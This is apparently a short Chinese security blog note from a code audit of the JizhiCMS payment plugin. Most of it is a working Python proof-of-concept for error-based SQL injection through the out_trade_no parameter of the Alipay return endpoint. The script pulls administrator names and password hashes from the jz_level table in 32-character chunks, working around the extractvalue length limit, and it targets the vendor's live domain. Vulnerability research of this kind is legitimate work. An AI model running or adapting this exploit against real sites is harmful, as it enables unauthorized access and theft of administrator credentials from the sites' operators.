本地代码审计 极致cms 支付插件 sql注入 Poc

本地代码审计 极致cms 支付插件 sql注入 Poc

报错注入32位长度限制，poc写法，获取长度，按32位截取。做个记录。

报错注入POC

import requests
import re


def get_length():
    #url_start = 'http://www.jizhicms.com'
    payload = "/mypay/alipay_return_pay?out_trade_no=1' and extractvalue(1,concat(0x7e,(SELECT  DISTINCT LENGTH((GROUP_CONCAT(NAME,0x7e,pass))) FROM jz_level )))--+"
    req = requests.get(url=url_start+payload)
    html = req.text
    #print(html)
    length = re.search('~(.*?)\'',html).group(1)
    return length

def get_hash(start,end):
    #url_start = 'http://www.jizhicms.com'
    payload = "/mypay/alipay_return_pay?out_trade_no=1' and extractvalue(1,concat(0x7e,(select  substr((group_concat(name,0x7e,pass)),{0},{1}) from jz_level )))--+"
    payload = payload.format(start,end)
    req = requests.get(url=url_start+payload)
    html = req.text
    #print(html)
    hash = re.search('~(.*?)\'',html).group(1)
    return hash

def main():
    string = ''
    length = get_length()
    #/是精确除法，//是向下取整除法，%是求模
    turn = int(length)//32
    #print(turn)
    for i in range(0,turn+1):
        #print(i)
        hash = get_hash(1+(i*32),32)
        string += hash

    return string

url_start = 'http://www.jizhicms.com/'
print(main())